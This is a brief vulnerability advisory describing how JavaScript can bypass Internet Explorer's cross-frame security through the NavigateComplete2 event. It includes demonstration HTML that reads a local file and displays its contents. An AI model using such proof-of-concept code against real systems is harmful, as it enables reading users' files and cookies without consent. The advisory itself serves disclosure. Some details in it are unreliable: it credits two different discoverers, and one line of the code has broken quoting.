Circumventing IE Cross Frame Security

 
Circumventing IE Cross Frame Security
Reported June 6 by Georgi Guninki

DESCRIPTION

By using Javascript to access the document object model (DOM) of HTML documents, Internet Explorer"s cross-frame security policy can be circumvented. The problem allows reading local files, reading files from other hosts, window spoofing, cookies exposure, and more.

The problem is that when the NavigateComplete2 event is initiated it  passes an argument of WebBrowser control. The WebBrowser control has an accessible property "document" that allows access to the DOM of the target document.

DEMONSTRATION CODE

------frame2.html--------------------------------
<IFRAME ID="I1"></IFRAME>
<SCRIPT for=I1 event="NavigateComplete2(b)"> alert("Here is your file:\n"+b.document.body.innerText); </SCRIPT>
<SCRIPT> I1.navigate("file://c:/test.txt"); setTimeout("I1.navigate("file://c:/test.txt")",1000); </SCRIPT>
---------------------------------------------------

VENDOR RESPONSE

Microsoft is aware of this matter, however no response was known at the time of this writing.

CREDITS
Discovered and reported by Luke Kenneth Casson Leighton